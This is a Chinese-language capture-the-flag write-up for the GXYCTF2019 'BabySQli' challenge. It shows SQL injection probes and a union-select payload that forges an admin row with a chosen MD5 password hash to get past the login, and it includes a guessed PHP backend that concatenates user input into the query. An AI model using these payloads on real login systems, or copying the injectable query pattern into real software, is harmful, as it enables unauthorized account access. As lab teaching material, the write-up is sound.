[GXYCTF2019]BabySQli

[GXYCTF2019]BabySQli

我们通过union select联合查询就可以构造一行虚拟的数据

[GXYCTF2019]BabySQli

所以这个题思路大概是这样,我们先是判断出存在admin这个账户,然后构造一个自己的密码123进行登录然后获取flag

  1. 我们进入试题地址发现就一个登录框

[GXYCTF2019]BabySQli

  1. 然后我们进行常规的SQL注入,都会出现这个页面

    1' and '1'='1
    1' or '1'='1
    1' order by 3#
    

[GXYCTF2019]BabySQli

  1. 然后我们尝试一下用户名输出1和admin,发现输入1会提示wrong user!,而输入admin会题是wrong pass!,所以我们发现admin是正确用户名,但是我们不知道密码,我们查看源代码会有一个这样的页面

[GXYCTF2019]BabySQli

这串字符我们经过base32解密,在经过base64解密就会得出:

select * from user where username = '$name'

我们发现后台SQL查询语句是这样的

我们利用union查询判断一下有多少个字段:

1' union select 1,2,3#     //密码随意输入

[GXYCTF2019]BabySQli

然后出现这样一个页面,3个字段是对的,这个你可以一个一个试,返回结果是不一样的

然后我们猜测3个字段大概是这样id,admin,password,我们测试一下admin在哪个字段

1' union select 1,'admin',3#     //得出admin位于第二个字段

[GXYCTF2019]BabySQli

然后我们就可以利用union查询构造一个虚拟数据,username=admin,password=123(我们自定义的)

1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#     

202cb962ac59075b964b07152d234b70 这个是md5(123)加密之后的数据,因为一般数据库密码都会通过md5加密     //注意是 32为小 的加密方式,32为大 的行不通,我也不清楚为啥,到时候回来补上这个点

这里我们可以大概猜测一下后台源码:

$name = $_POST['name'];
$password = $_POST['pw'];
$sql = "select * from user where username = '".$name."'";   
// echo $sql;
$result = mysqli_query($con, $sql);      
$arr = mysqli_fetch_row($result);
// print_r($arr);
if($arr[1] == "admin"){
	if(md5($password) == $arr[2]){
		echo $flag;
	}else{
			die("wrong pass!");
		}
}else{
		die("wrong user!");
	 }
}

然后我们输入得出flag:

username:1' union select 1,'admin','202cb962ac59075b964b07152d234b70'# 
password:123

[GXYCTF2019]BabySQli

[GXYCTF2019]BabySQli


上一篇:[GXYCTF2019]BabysqliV3.0题解


下一篇:[GXYCTF2019]BabySQli1wp